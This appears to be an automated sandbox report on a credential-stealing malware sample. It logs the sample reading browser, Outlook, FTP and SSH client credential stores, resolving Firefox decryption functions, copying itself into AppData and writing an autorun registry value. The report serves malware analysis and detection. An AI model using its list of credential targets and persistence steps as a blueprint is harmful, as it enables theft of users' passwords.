c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b	0.05 KB	MD5: eca0470178275ac94e5de381969ed232 SHA1: d6de27e734eec57d1dda73489b4a6d6eecae3038 SHA256: 353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f812e7594cf2ec5ca1175785b50 SSDeep: 3::		... File Actions Show Properties Download

Host Behavior

File (21)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Directory	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25	-	1	Fn
Get Info	C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = size, size_out = 0	1	Fn
Get Info	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25	type = file_attributes	1	Fn
Get Info	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25	type = file_attributes	4	Fn
Get Info	C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	type = size, size_out = 0	1	Fn
Copy	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe	source_filename = C:\Windows\SysWOW64\svchost.exe	1	Fn
Move	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe	source_filename = C:\Windows\SysWOW64\svchost.exe, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
Read	C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 18432, size_out = 18432	1	Fn Data
Read	C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	size = 11264, size_out = 11264	1	Fn Data
Write	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb	size = 4	1	Fn Data
Write	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck	size = 1	1	Fn Data
Delete	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb	-	1	Fn
Delete	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck	-	1	Fn

Registry (166)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\IncrediMail\Identities	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Martin Prikryl	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Martin Prikryl	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\WinChips\UserAccounts	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography	value_name = MachineGuid, data = 52	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Main	value_name = Install Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup	value_name = SetupPath	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari	value_name = InstallDir	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock	value_name = CurrentVersion	1	Fn
Read Value	HKEY_CURRENT_USER\Software\VanDyke\SecureFX	value_name = Config Path	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail	value_name = CurrentVersion	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Email Address, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Server, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP User Name, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP User, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Server, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 User Name, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 User, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = NNTP Email Address, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = NNTP User Name, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = NNTP Server, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP Server, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP User Name, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP User, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTP User, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTP Server URL, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTPMail User Name, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTPMail Server, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Port	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Port	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP Port	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Password2	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP Password2	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = NNTP Password2	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTPMail Password2	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Password2	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Password	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP Password	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = NNTP Password	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTP Password	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Password	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e	value_name = Email, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	value_name = Email, type = REG_NONE	1	Fn
Write Value	HKEY_LOCAL_MACHINE\��К��ы�Б��Й��я��	value_name = BAEF25, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	-	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn

Module (1222)

Operation	Module	Additional Information	Count	Logfile
Load	SHELL32	base_address = 0x752c0000	25	Fn
Load	shlwapi	base_address = 0x74c10000	441	Fn
Load	OLEAUT32.dll	base_address = 0x76ce0000	1	Fn
Load	ws2_32.dll	base_address = 0x76ed0000	1	Fn
Load	ole32.dll	base_address = 0x76f30000	1	Fn
Load	ADVAPI32	base_address = 0x74c60000	509	Fn
Load	user32	base_address = 0x74ad0000	228	Fn
Load	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	base_address = 0x73580000	1	Fn
Load	NETAPI32	base_address = 0x747c0000	3	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 259	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = NSS_Init, address_out = 0x7360ee9a	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = NSS_Shutdown, address_out = 0x7360f125	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_GetInternalKeySlot, address_out = 0x73632f61	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_FreeSlot, address_out = 0x736329d3	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_Authenticate, address_out = 0x7361bb28	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11SDR_Decrypt, address_out = 0x7362ef47	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_CheckUserPassword, address_out = 0x7361bc2d	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = SECITEM_FreeItem, address_out = 0x736100e2	1	Fn
Get Address	c:\windows\syswow64\ucrtbase.dll	function = NetUserGetInfo, address_out = 0x74762130	3	Fn

User (1)

Operation	Additional Information	Success	Count	Logfile
Lookup Privilege	privilege = SeDebugPrivilege, luid = 20		1	Fn

System (32)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = LHNIWSJ	3	Fn
Sleep	duration = 10 milliseconds (0.010 seconds)	5	Fn
Sleep	duration = 60000 milliseconds (60.000 seconds)	21	Fn
Get Info	type = Hardware Information	3	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = 66BF479BAEF25E987DDFD92A		1	Fn

Environment (4)

Operation	Additional Information	Count	Logfile
